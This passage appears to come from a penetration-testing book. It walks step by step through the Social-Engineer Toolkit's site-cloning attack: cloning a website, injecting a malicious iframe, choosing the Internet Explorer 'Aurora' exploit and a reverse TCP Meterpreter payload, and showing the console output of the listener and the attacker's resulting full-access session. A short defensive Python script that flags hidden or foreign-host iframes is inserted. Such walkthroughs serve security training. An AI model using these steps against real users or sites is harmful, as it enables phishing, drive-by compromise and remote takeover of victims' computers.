The Social-Engineer Toolkit
SET supports both HTTP and HTTPS
Example: http://www.thisisafakesite.com
Enter the url to clone:
http://www.secmaniac.com
Select Website Attack Vectors from the SET main menu, and then select The Metasploit Browser Exploit Method. Then select the Site Cloner option, and enter http://www.secmaniac.com as the website you want to use for cloning.
Once the site is cloned, we’ll set up the exploit to trigger when a target
browses the site.
Enter the browser exploit you would like to use
16. Microsoft Internet Explorer "Aurora"
Enter your choice (1-23) (enter for default):
16
What payload do you want to generate:
Name: Description:
2. Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send
back to attacker.
Enter choice (example 1-10) (Enter for default):
Enter the port to use for the reverse (enter for default):
[*] Cloning the website: http://www.secmaniac.com
[*] This could take a little bit...
[*] Injecting iframes into cloned website for MSF Attack....
[*] Malicious iframe injection successful...crafting payload.
[*] Launching MSF Listener...
[*] This may take a few to load MSF...
resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
msf exploit(ms10_002_aurora) >
[*] Started reverse handler on 10.10.1.112:443
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http:// 10.10.1.112:8080/
[*] Server started.
To complete the attack setup, select the client-side exploit you wish to use. Above, we choose the infamous Internet Explorer Aurora exploit and accept the default reverse Meterpreter payload by pressing ENTER.
When the target reaches http://www.secmaniac.com/, the site looks normal, but his system is compromised through an iframe injection. SET automatically rewrites the site to contain the iframe that houses the Metasploit client-side attack.
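From the defender's side, the injected frame is what distinguishes the clone from the genuine page. The following added example (not code from the book or from SET) parses a page and reports every iframe loaded from a host other than the page's own. The sample markup is constructed, the frame address reuses the listener address from the console output above, and the zero-size attributes are an assumption about how such a frame might be hidden.

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

class IframeCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.frames = []  # one attribute dict per <iframe> start tag
    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.frames.append(dict(attrs))

def is_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False

def is_hidden(attrs):
    style = (attrs.get("style") or "").replace(" ", "").lower()
    tiny = attrs.get("width") in ("0", "1") or attrs.get("height") in ("0", "1")
    return tiny or "display:none" in style or "visibility:hidden" in style

def suspicious_iframes(page_url, html):
    """Return (src, reasons) for frames loaded from a host other than the page's."""
    page_host = urlparse(page_url).hostname
    collector = IframeCollector()
    collector.feed(html)
    findings = []
    for attrs in collector.frames:
        src = urljoin(page_url, attrs.get("src") or "")
        url = urlparse(src)
        if not url.hostname or url.hostname == page_host:
            continue  # same-host frame, nothing to report
        reasons = ["foreign-host"]
        if is_ip(url.hostname):
            reasons.append("raw-ip")
        if url.port not in (None, 80, 443):
            reasons.append("nonstandard-port")
        if is_hidden(attrs):
            reasons.append("hidden")
        findings.append((src, reasons))
    return findings

# Constructed sample: one legitimate same-host frame, one injected frame.
SAMPLE = ('<iframe src="/widgets/feed.html" width="300" height="200"></iframe>'
          '<iframe src="http://10.10.1.112:8080/" width="0" height="0"></iframe>')
```

Run against a snapshot of a page you own, any frame that carries several reasons at once and is absent from the published source deserves investigation.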
Back at the attacking machine, we see that the attack is successful. The
Meterpreter session has established the connection from the target to the
attacking machine, and we have full access to the system, as shown here.